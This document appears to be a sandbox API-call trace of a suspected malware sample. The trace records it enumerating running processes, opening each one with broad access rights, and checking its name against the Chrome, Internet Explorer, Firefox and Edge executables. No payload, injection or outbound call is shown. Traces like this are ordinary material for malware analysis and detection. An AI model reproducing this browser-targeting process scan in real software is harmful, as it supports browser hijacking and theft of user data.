	[0216.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x47a0
	[0216.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.277] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.277] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.278] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.278] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x47a4
	[0216.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.279] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.280] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.280] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.280] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.280] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0216.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x47a8
	[0216.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.281] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0216.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.282] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.282] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0216.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.283] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.283] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x47ac
	[0216.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.284] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.284] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.285] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.285] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.285] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0216.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x47b0
	[0216.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.286] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0216.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.287] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.287] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0216.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.287] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.288] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0216.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x47b4
	[0216.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.289] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0216.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.289] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.290] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0216.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.290] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.290] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0216.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x47b8
	[0216.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.291] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0216.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.291] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.291] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0216.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.292] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0216.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x47bc
	[0216.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.293] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.293] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.293] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.294] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.294] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x47c0
	[0216.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.295] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.296] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x47c4
	[0216.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.297] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.297] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.298] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.298] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x47c8
	[0216.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.299] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.300] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.300] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.300] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x47cc
	[0216.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.301] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.302] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.302] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.302] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x47d0
	[0216.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.303] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.303] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.304] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.304] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.304] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x47d4
	[0216.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.305] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.305] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.306] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x47d8
	[0216.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.307] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.307] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.307] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.308] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0216.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x47dc
	[0216.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.309] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0216.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.309] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.309] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0216.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.310] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x47e0
	[0216.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.311] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.311] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.312] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.312] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.312] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0216.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x47e4
	[0216.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.313] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.313] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.314] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.314] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.314] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x47e8
	[0216.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.315] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.315] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.316] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.316] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x47ec
	[0216.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.317] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.317] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.317] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0216.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x47f0
	[0216.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.319] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0216.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.319] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.320] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0216.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.320] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0216.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x47f4
	[0216.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.322] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0216.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.322] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.322] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0216.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.323] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.323] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0216.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x47f8
	[0216.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.324] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.324] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.324] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.324] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.325] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0216.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x47fc
	[0216.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.325] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0216.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.326] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.326] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0216.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.327] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0216.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0216.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0216.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4804
	[0216.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.329] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0216.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.329] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.330] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0216.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
